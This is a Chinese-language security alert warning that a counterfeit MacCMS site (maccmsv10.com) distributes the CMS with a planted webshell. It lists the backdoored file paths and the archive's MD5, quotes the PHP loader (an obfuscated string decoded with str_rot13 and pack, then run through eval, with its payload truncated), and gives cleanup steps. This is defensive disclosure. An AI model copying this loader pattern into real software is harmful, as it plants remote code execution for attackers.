某天始,MacCMS官網因為某些原因停擺。同時在百度搜索蘋果CMS或MacCMS出現的排名第一均為一個:www.maccmsv10.com的網址,而真正的官網地址是www.maccms.com。前者使用了一個和maccms官網一模一樣的靜態首頁提供程序下載。最近幾天陸續有人發現了從這個網站下載的蘋果CMS程序存在后門webshell。
直接從該第三方站點下載了源碼,至今10月14日依然存在后門,所以基本可確信是故意搭建的假冒官網。
這里給出官方github地址:https://github.com/magicblack/maccms10
后門文件路徑
1、maccms10\extend\\upyun\src\Upyun\Api\Format.php
2、maccms10\extend\Qcloud\Sms\Sms.php
MD5 (maccms10.zip) = 099e02dfa9d283e2891bce5bf9691643
最后修改日期都是:2019/6/12
<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "0d41c75e2ab34a3740834cdd7e066d90";
function s(){
$str = "66756r6374696s6r207374…………"; //大馬
$str = str_rot13($str);
m($str);
}
function m($str){
global $password;
$jj = ";
eval($jj.pack('H*',$str).$jj);
}
s();
?>MacCMS后門Webshell
很坦誠的孩子,一目了然!!!登錄后主界面
有些資歷的老黑可能一眼就看出來了,這是一個習科大馬改進版。
修復方法
1、排查你的程序是否存在上面的后門路徑文件
2、如果存在,刪除后門文件,并進行全盤查殺掃描
3、手動查看可疑文件是存存在隱藏后門
4、檢查服務器安全
